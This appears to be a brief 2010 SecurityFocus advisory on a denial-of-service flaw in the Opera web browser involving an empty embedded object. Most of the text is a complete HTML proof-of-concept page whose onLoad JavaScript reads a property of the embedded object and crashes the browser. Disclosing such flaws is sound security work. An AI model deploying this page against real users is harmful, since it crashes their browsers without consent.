Opera Web Browser Empty Embedded Object JavaScript Denial Of Service Vulnerability

An exploit is not required. An example sufficient to exploit this vulnerability was provided:

<html><head>
<script language=javascript>
function dSend() {
document.crash.text;
}
</script></head>
<body onLoad="dSend()">
<embed src="" type="CCCC" name="crash" >
</embed>
</body></html>


 

Privacy Statement
Copyright 2010, SecurityFocus